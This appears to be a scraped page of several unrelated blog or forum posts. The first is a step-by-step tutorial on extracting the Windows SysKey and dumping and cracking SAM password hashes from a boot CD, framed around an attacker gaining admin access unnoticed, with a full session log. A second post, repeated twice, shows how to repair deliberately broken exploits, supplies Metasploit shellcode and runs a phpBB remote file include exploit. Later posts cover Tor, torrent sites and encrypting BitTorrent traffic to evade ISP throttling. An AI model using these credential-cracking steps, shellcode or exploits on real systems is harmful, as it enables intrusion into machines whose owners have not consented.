Cracking Syskey and the SAM on Windows XP, 2000 and NT 4

SysKey is an extra level of encryption put on the hashes in the SAM file [1]. SysKey was introduced in Service Pack 3 (SP3) for NT 4 but every version of Windows since has had SysKey enabled by default. The way most folks crack a SAM file on a system that uses SysKey is by running a utility called PWDump as an admin to get the LM (LAN Manager) and NT hashes. The problem is PWdump only works if you can run it from an administrator level account, and if the reason an attacker is cracking the hashes in the first place is to get an administrator level account then PWdump is of little use.

Some folks will ask why would you want to crack the passwords in the SAM at all since it’s far easier to just change the Administrator password using a Linux boot disk or Sala’s Password Renew for PE Builder. The reason an attacker may want to crack the local passwords instead of changing them is two fold:

1. An attacker doesn’t want to tip off the system administrators. If they notice that the old local admin password no longer works they will get a little bit suspicious don’t you think? This is somewhatsolved by Sala’s Password Renew since it lets you add new admin level accounts as well as change existing account’s passwords.

2. The same local account passwords may be used on other systems on the network (and most likely are if they use imaging software like Ghost). If the attacker can crack one machine’s admin password that same password may allow the attacker to gain access to other boxes on that LAN that they only have remote access (across the network) to.

This article assumes that the attacker has only physical access to the machine whose SAM they want to crack and that they also have access to the Knoppix variant known as the Auditor security collection boot CD [5] (I’m using version 120305-01 in this tutorial). Here are the steps you will need to take in order to audit local passwords using the Auditor CD:

Step 1. Download the Auditor Boot CD ISO and burn it to a CD-R. All of the tools we will be using in this tutorial come on the Auditor Boot CD.

Step 2. Insert the Auditor Boot CD into the target system, reboot and set the CD-ROM as the first boot device in the BIOS. Some systems let you hold down a certain function key at startup to choose what media to boot from (on recent Dell’s it’s F12).

Step 3. Auditor will begin to boot and ask you what screen resolution you want to use. Choose a resolution that your monitor and video card will support (I use 2 for 1024x768) then hit enter.

Step 4. When Auditor finishes booting click on the icon on the KDE bar for a new terminal window (it looks like a little monitor). Below you will see the commands you will have to use to get past SysKey, extract the hashes and attempt to crack the password hashes.

Step 5. Mount the local hard disk, most likely hda1:

Linux Command:
mount /dev/hda1

Step 6. Change the present working directory to the ramdisk so we space to work with the files we will be creating:

Linux Command:

cd /ramdisk/

Step 7. Auditor comes with Ncuomo’s Samdump2 and Bkhive [6]. We will be using these tools to extract the system key from the System hive and the password hashes from the SAM file. To get the system key we need to use the Bkhive on our SYSTEM file (most likely in C:\WINDOWS\system32/config\SYSTEM, that’s where it is on my XP Pro test box, on some systems it will me in C:\WINNT\system32/config\SYSTEM or perhaps some other drive entirely). By the way, if for some reason you are running NT4 SP3 you will need to use Bkreg instead, all later system (NT4 SP4, 2000 and XP) use Bkhive. To grab the system key and put it into a file we use the following command:

Linux Command:

bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt

Step 8. Now that we have the system key we can use it to undo SysKey on the SAM, extract the hashes and place them into a PWDump format file:

Linux Command:

samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt>password-hashes.txt

Step 9. At this point we have a PWDump format file called password-hashes.txt that we could copy off of the system and import into L0phtcrack [7] or Cain [8] (see the old tutorial for details). Since I said we were going to do it all with the Auditor CD and Open Source tools we will use John the Ripper to crack the hashes, but before we can use John we have to extract one of the many wordlists that comes with Auditor. Take a look on the CD in /opt/auditor/full/share/wordlists/ for all of the different wordlists you can use, I’ll use english.txt for this tutorial. To extract english.txt to the ramdisk use the following command:

Linux Command:
gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt

Step 10. Now that everything is in place we can run John with a simple dictionary attack to see if we can crack any of the hashes:

Linux Command:

john password-hashes.txt -w:eng.txt

John detects that the dump file has LM (LAN Manager) hashes in it and chooses the format “NT LM DES [32/32 BS]” automatically. If I had disabled the storing of LM hashes in the SAM I might want to use the –f option to specify the NT hash format and try to crack the NT hashes instead. To do that I would use the following command:

Linux Command:

john password-hashes.txt -f:NT -w:eng.txt

If dictionary attacks aren’t working and you have a lot of time (as well as a fast computer) you can try John’s incremental (brute force) mode and see if it gives you better results:

Linux Command:

john password-hashes.txt -i:all

Incremental mode is limited to only eight characters unless you change the source before you compile it, but at more than eight characters you will likely be waiting a very long time for John to finish. Doing more that eight characters is pointless anyway if you have the LM hashes since there are stored as two seven byte parts (NT hashes are a different story and can be harder to crack).

In case you were wondering what all of these commands would look like along with their output here is a copy of my session log that may help you understand how they all work together (notice that the password for the Administrator account is “monkey”):

Session Log saved from Auditor CD:

root@1[~]# mount /dev/hda1 root@1[~]# cd /ramdisk/ root@1[ramdisk]# bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt Bkhive ncuomo@studenti.unina.it Bootkey: 407af4376e55f1fd6d58cc47a4fa4c01 root@1[ramdisk]# samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt>password-hashes .txt Samdump2 ncuomo@studenti.unina.it This product includes cryptographic software written by Eric Young (eay@cryptsoft.com) No password for user Guest(501) No V value! root@1[ramdisk]# gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt root@1[ramdisk]# john password-hashes.txt -w:eng.txt Loaded 3 password hashes with no different salts (NT LM DES [32/32 BS]) MONKEY (Administrator) guesses: 1 time: 0:00:00:03 100% c/s: 1622943 trying: ZZYZX - ZZZZZZZ root@1[ramdisk]# john password-hashes.txt -f:NT -w:eng.txt Loaded 2 password hashes with no different salts (NT MD4 [TridgeMD4]) monkey (Administrator) guesses: 1 time: 0:00:00:12 100% c/s: 464435 trying: zzzzzzzzzzzzzzzzzzzzzz root@1[ramdisk]#

Mitigating SAM and SysKey Cracking

There are a few things you can do to make it harder for attacker to crack you local passwords. An attacker will most likely have to get into the BIOs to set it to boot from the CD-ROM. Setting up a BIOs password will help keep crackers from using the Auditor CD (or any boot CD) but if they can get into the computer’s case it’s easy to reset a BIOs password so some sort of physical case lock should be used as well. Strong passwords (non-dictionary words with more that just alphanumeric characters) will also make it harder for attackers to crack passwords since they will have to resort to potentially slow brute force methods.

I hope this short tutorial helps, feel free to write me if you have any questions. Some other techniques you may want to look into for faster cracking are cracking clusters [9] and Rainbow tables [10]. Enjoy your hash. :)

Read More

Get IP address anonymity everytime

i have found one software which hide your IP address every time and give you a new IP address by creating a Tor Network…….

If u have Mozilla then it works very fine

First Download Vidalia Bundle from here


http://www.torproject.org/download.html.en

Here is link for Windows and MAC OS ……….So download it according to your requirement .

After that to easily turn on and turn off “TOR” .. You can install Firefox add on from here :


https://addons.mozilla.org/en-US/firefox/addon/2275

then restart firefox….After that you will see at right bottom corner that your tor addon for mozilla is installed…now when u want to hide your IP or want to surfing anonymously Turn on or turn off by clicking on this.

You can check your ip address here

http://www.whatismyip.com/

Read More

Using exploits. Includes noob protection

ways to handle and compile exploits. Alot of exploits come with "noob protection". Noob protection being they will move or add sections of text or scramble a simple statement so people immediatly know that it shouldnt be that way. This protects against skiddies and noobs from getting and running the exploit. I will show you how to compile exploits with Dev C++ and run perl and php scripts. I will also include the entire remote library from milw0rm compiled in complete.

Downloads: dev c++, perl (win), perl (source), openSSL (win)

WSAStartup
Quote:
[linker error] undefined reference to `WSAStartup@8'
[linker error] undefined reference to `socket@12'

Open dev c++ options



in the main window will be a checkbox that says "Add the following commands when calling the compiler" type this in the box -lwsock32





press ok and compile again.
----

Using Shellcodes
you can generate shellcodes for metasploits projects with ease. here is one i made for this post




/* win32_exec - EXITFUNC=seh CMD=shutdown -f -s Size=168 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"x31xc9x83xe9xdcxd9xeexd9x74x24xf4x5bx81x73x13xec"
"x94x52x85x83xebxfcxe2xf4x10x7cx16x85xecx94xd9xc0"
"xd0x1fx2ex80x94x95xbdx0exa3x8cxd9xdaxccx95xb9xcc"
"x67xa0xd9x84x02xa5x92x1cx40x10x92xf1xebx55x98x88"
"xedx56xb9x71xd7xc0x76x81x99x71xd9xdaxc8x95xb9xe3"
"x67x98x19x0exb3x88x53x6ex67x88xd9x84x07x1dx0exa1"
"xe8x57x63x45x88x1fx12xb5x69x54x2ax89x67xd4x5ex0e"
"x9cx88xffx0ex84x9cxb9x8cx67x14xe2x85xecx94xd9xed"
"xd0xcbx63x73x8cxc2xdbx7dx6fx54x29xd5x84x64xd8x81"
"xb3xfcxcax7bx66x9ax05x7ax0bxe7x3axf0x98xf0x3dxf2"
"x82xb4x7fxe3xccxb9x21x85";





you can use that code and replace the shellcode in any exploit that uses the shellcode. You can generate new shellcodes here: http://metasploit.com:55555/PAYLOADS First, select the payload you wish to use.



then type the command you want it to execute, then press "generate payload"




PostPosted: Fri Dec 28, 2007 4:46 pm Reply with quoteBack to top
I will discuss ways to handle and compile exploits. Alot of exploits come with "noob protection". Noob protection being they will move or add sections of text or scramble a simple statement so people immediatly know that it shouldnt be that way. This protects against skiddies and noobs from getting and running the exploit. I will show you how to compile exploits with Dev C++ and run perl and php scripts. I will also include the entire remote library from milw0rm compiled in complete.

Downloads: dev c++, perl (win), perl (source), openSSL (win)

WSAStartup
Quote:
[linker error] undefined reference to `WSAStartup@8'
[linker error] undefined reference to `socket@12'

Open dev c++ options

Image

in the main window will be a checkbox that says "Add the following commands when calling the compiler" type this in the box -lwsock32

Image

press ok and compile again.
----

Using Shellcodes
you can generate shellcodes for metasploits projects with ease. here is one i made for this post
Code:
/* win32_exec - EXITFUNC=seh CMD=shutdown -f -s Size=168 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"x31xc9x83xe9xdcxd9xeexd9x74x24xf4x5bx81x73x13xec"
"x94x52x85x83xebxfcxe2xf4x10x7cx16x85xecx94xd9xc0"
"xd0x1fx2ex80x94x95xbdx0exa3x8cxd9xdaxccx95xb9xcc"
"x67xa0xd9x84x02xa5x92x1cx40x10x92xf1xebx55x98x88"
"xedx56xb9x71xd7xc0x76x81x99x71xd9xdaxc8x95xb9xe3"
"x67x98x19x0exb3x88x53x6ex67x88xd9x84x07x1dx0exa1"
"xe8x57x63x45x88x1fx12xb5x69x54x2ax89x67xd4x5ex0e"
"x9cx88xffx0ex84x9cxb9x8cx67x14xe2x85xecx94xd9xed"
"xd0xcbx63x73x8cxc2xdbx7dx6fx54x29xd5x84x64xd8x81"
"xb3xfcxcax7bx66x9ax05x7ax0bxe7x3axf0x98xf0x3dxf2"
"x82xb4x7fxe3xccxb9x21x85";


you can use that code and replace the shellcode in any exploit that uses the shellcode. You can generate new shellcodes here: http://metasploit.com:55555/PAYLOADS First, select the payload you wish to use.

Image

then type the command you want it to execute, then press "generate payload"

Image

your shellcode should be printed out nicely for you.
- - -

Perl Exploits
If your using windows install this msi package. Lets use an example perl script from milw0rm. http://www.milw0rm.com/exploits/3661

save that exploit to your c: drive as a file called "3661.pl". This exploit justs generates an HTML file exploit, "exploit.html". Its that simple. But some exploits require you to have SSL installed. so you can grab that for windows at the top of this post with the other downloads. Some exploits may require you to pass "arguments" to the application, like this epxloit.

uh oh, noob protection?




syntax error at C:2552.pl line 47, near "print"
Execution of C:2552.pl aborted due to compilation errors.





well instantly i see the end of the line $vul=" is on has no ";" at the end of it. Put that in there so it looks like this




$host=$ARGV[0];
$path=$ARGV[1];
$vul="phpbb_security.php?phpbb_root_path=";





now save it and try again. YAY




C:>2552.pl

################################################## ########################
# #
# phpBB Security <= 1.0.1 Remote File Include Vulnerability #
# Bug found By : Ashiyane Corporation #
# Email: nima salehi nima[at]ashiyane.ir #
# Web Site : www.Ashiyane.ir #
# #
################################################## ########################

Usage: Ashiyane.pl [host] [path]





EX : Ashiyane.pl www.victim.com /path/

Read More

Most Popular Torrent Sites of 2007

1. Mininova

Without a doubt the most visited BitTorrent site. In November, Mininova reached a milestone by entering the list of the 50 most visited websites on the Internet.

Alexa rank: 46
2. IsoHunt

IsoHunt continued to grow this year. In September they were forced to close their trackers to US traffic because of the issues they have with the MPAA, but this had no effect on the visitor count.

Alexa rank: 143
3. The Pirate Bay

The Pirate Bay has been in the news quite a bit this year and remains not only the most used BitTorrent tracker, but also one of the most visited BitTorrent sites. At the moment they are fighting with IsoHunt for the second place in this list.

Alexa rank: 147
4. Torrentz

Torrentz is the only “torrent site” in the top 10 that doesn’t host .torrent files. Several improvements and new features have been introduced over the past year such as a comment system, private bookmarks and a cleaner layout.

Alexa rank: 160
5. BTjunkie

BTjunkie was one of the fastest risers last year and continued to grow throughout 2007. Last month they were, like many others, forced to leave their ISP (LeaseWeb), but the transition to a new host went smoothly and didn’t result in any downtime.

Alexa rank: 445
6. TorrentSpy

TorrentSpy was the most popular BitTorrent site of 2006, but dropped to sixth place due to legal issues with the MPAA. To ensure the privacy of their users, TorrentSpy decided that it was best to block access to all users from the US, causing their traffic to plunge.

Alexa rank: 461
7. TorrentPortal

Not much news about TorrentPortal this year, but that probably is a good thing. Like most other sites they have grown quite a bit in 2007.

Alexa rank: 481
8. GamesTorrents

It’s quite a surprise to see GamesTorrents in the list of 10 most popular BitTorrent sites of 2007. This Spanish BitTorrent site had a huge dip in traffic earlier this year but managed to secure 8th place.

Alexa rank: 583
9. TorrentReactor

TorrentReactor.net has been around for quite a while, four years to be exact, and is still growing.

Alexa rank: 604
10. BTmon

BTmon was one of the newcomers in 2006, and it is the youngest BitTorrent site in the top 10 this year.

Alexa rank: 673
Honorable Mention: Demonoid

For being one of the most visited BitTorrent sites until they pulled the plug in Novembe

Read More

How to make BitTorrent Transfers Anonymous

The Swedish Pirate Party introduced a completely anonymous internet service called relakks. Relakks makes it possible to browse the web, and use p2p-applications (like BitTorrent) without being monitored by your ISP or anti-piracy gangs like the MPAA and RIAA.

“There are many legitimate reasons to want to be completely anonymous on the Internet,” says Rickard Falkvinge, chairman of the Pirate Party. “If the government can check everything each citizen does, nobody can keep the government in check. The right to exchange information in private is fundamental to the democratic society. Without a safe and convenient way of accessing the Internet anonymously, this right is rendered null and void.

Subscriptions cost EUR 5.00 per month or EUR 50.00 for 12 months

Read More

Start your own BitTorrent tracker

To the novice, setting up a BitTorrent tracker is a hugely complex task. Within minutes of making the decision to even attempt such a thing, it becomes crystal clear that without specialist coding knowledge the project is doomed to fail, probably before it even starts. In order for BitTorrent tracker ownership to be accessible to all, the technical roadblocks need to be overcome.

The team behind XBTIT (previously BTiTracker) are hoping to achieve just that with their latest beta version.

XBTIT enables potential site administrators to quickly and easily set up their own BitTorrent tracker, something that was previously only available to people with some coding skills.

In order to make the process as user-friendly as possible, the team are offering some major upgrades and features:
Optional SMF Forum Integration

SMF is a fully featured bulletin board system which is very easy to set up. Downloaded and installed separately, user accounts are fully integrated with XBTIT after installation so there is no need for multiple log ins.
Optional XBT Tracker Integration

XBT Tracker is a BitTorrent tracker written in C++. The advantages of using this is that you can have many more peers than a traditional PHP based tracker while consuming very few resources on your server, making ownership of a very large tracker a reality.
One Click Hack/Modification Installation

All the best trackers have great modifications designed to bring additional functionality to the site. However, installing these can still be quite a task for the experienced - and absolutely mind-blowing for the novice. XBTIT offers One-Click-Hack which means no more having to hack away at lines of code to install the latest modifications for your tracker. An automated system for hack installation is included which is great news for the novice.
Fully Customizable Template System

This means there is no requirement to hack away at code to change the look of your site. Templates are now totally separate from the tracker source so it’s possible to tinker with the look of the site without worrying about breaking anything. New templates will be available with the final version of the software.
Updated Installation Routine

The new installation routine takes care of everything that previously had to be done by hand, saving much time when installing a new tracker.

The XBTIT team told us they are proud to be leading the way with what they believe is the most customizable and accessible tracker to date, and they are inviting any interested TorrentFreak readers to apply for beta testing at www.btiteam.org

Read More

How To Encrypt BitTorrent Traffic

The list of ISP’s that limit BitTorrent traffic, or plan to do so is growing every day, and according to the BBC, the ‘bandwidth war’ has begun.

Are you not sure if your traffic is being throttled Check the list of bad ISP’s.

But there is a solution. Encrypting your torrents will prevent throttling ISP’s from shaping your traffic. I will explain how to enable encryption in Azureus, uTorrent, and Bitcomet, the three most popular torrent clients.

What does encryption Do?

The RC4 encryption obfuscates not only the header but the entire stream. This means that it’s very hard for your ISP to detect that the traffic you are generating comes from BitTorrent.

Note that RC4 uses more CPU time than the plain encryption or no encryption. It is however harder to identify for traffic shaping devices

How can I do this?

This is different for all clients; check the setting for your favorite client below.

Azureus

azureus bit torrent

1. Go to: Tools > Options > Connection > Transport Encryption

2. Check the ‘require encrypted transport’ box.

3. Choose RC4 in the ‘minimum encryption’ dropdown box

note that RC4 uses more CPU time than the plain encryption or no encryption. It is however harder to identify for traffic shaping devices
4. You can choose to tick the ‘Allow non-encrypted outgoing connections if encrypted connection attempt fails’ box. This will ensure compatibility with clients that are not using encryption. However, it makes it easier for your ISP to detect BitTorrent traffic. I recommend that you try to tick this box first. If you are still not getting proper speeds untick it

5. Tick the ‘Allow non-encrypted incoming connections’ box

azureus bit torrent

That’s it, your BitTorrent traffic is encrypted now.

Bitcomet

bitcomet bit torrent

1. Go to: Options > Preferences > Advanced > Connection

2. Go to: ‘Protocol encryption’ You can choose between ‘auto detect’ and ‘always’. Auto detect will give you more connections but offers less protection against traffic shapers.

I would recommend to try auto detect first, if that doesn’t increase your speeds you need to switch to always

bitcomet bit torrent

That’s it, your BitTorrent traffic is encrypted now.

uTorrent

utorrent bit torrent

1. Go to: Options > Preferences > BitTorrent

2. Go to ‘Protocol encryption’, you can choose between ‘enabled’ and ‘forced’. ‘Enabled’ will give you more connections but offers less protection against traffic shapers.

I would recommend to try ‘enabled’ first, if that doesn’t increase your speeds you need to swich to ‘forced’.

3. Ticking ‘Allow legacy incoming connections’ allows non ecrypted clients to connect to you. This improves compatibility between clients but makes you more vulnerable to traffic shapers.

I would recommend to tick this box, but if that doesn’t increase your speeds, untick it!

utorrent bit torrent

That’s it, your BitTorrent traffic is encrypted now.

Read More